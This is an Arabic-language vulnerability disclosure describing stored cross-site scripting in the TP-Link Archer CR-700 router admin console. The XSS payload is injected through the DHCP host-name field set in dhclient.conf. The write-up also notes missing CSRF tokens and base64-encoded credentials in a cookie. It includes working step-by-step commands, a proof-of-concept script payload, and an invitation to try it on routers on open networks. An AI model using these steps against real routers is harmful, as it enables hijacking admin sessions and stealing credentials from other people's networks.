
استغلال راوتر TP-Link Archer CR-700. (تم الإفصاح عنه بمسؤولية إلى TP-Link)
استغلال راوتر TP-Link Archer CR-700. (تم الإفصاح عنه بشكل مسؤول إلى TP-Link)
الخطوة 1-> على جهاز اللينكس لديك (Kali أو Ubuntu) اكتب الأمر التالي
gedit /etc/dhcp/dhclient.conf
قم بتعليق السطر التالي #send host-name = gethostname();
انسخه إلى السطر الذي يليه وغيّر دالة gethostname() إلى سكربت XSS كما هو موضح أدناه.
send host-name = "<script>alert(5)</script>";
الخطوة 2:أعد تشغيل نظام لينكس حتى تدخل التغييرات حيز التنفيذ.
الخطوة 3: أرسل طلب DHCP إلى الراوتر للحصول على عنوان IP باستخدام الأمر أدناه.(جرّب هذا على أي أجهزة توجيه على الشبكات المفتوحة التي تستخدم TP-Link Archer CR-700)
dhclient -v -i wlan0
عند تشغيل الأمر أعلاه، يتم إرسال طلب DHCP إلى الراوتر. في أثناء طلب DHCP، يتم إرسال اسم المضيف الذي قمنا بإعداده قسريًا ليكون سكربت XSS <script>alert(5)</script>
الخطوة 4: سجّل الدخول إلى وحدة تحكم المسؤول.
عند تسجيل الدخول، يتم تنفيذ السكربت.
قضية إضافية لاحظتها في الراوتر وهي عدم وجود رمز CSRF. الكوكي الذي يعيّنه الراوتر يحتوي على اسم مستخدم وكلمة مرور مشفّرين بـ base64، ويمكن سرقتهما باستخدام سكربت XSS.
ملاحظة:جميع المعلومات المذكورة أعلاه تم الإفصاح عنها إلى TP-Link، الذين أعادوا إنتاج المشكلة وأحالوها إلى فريق البحث والتطوير لديهم لإصلاحها.
رابط المنتج https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W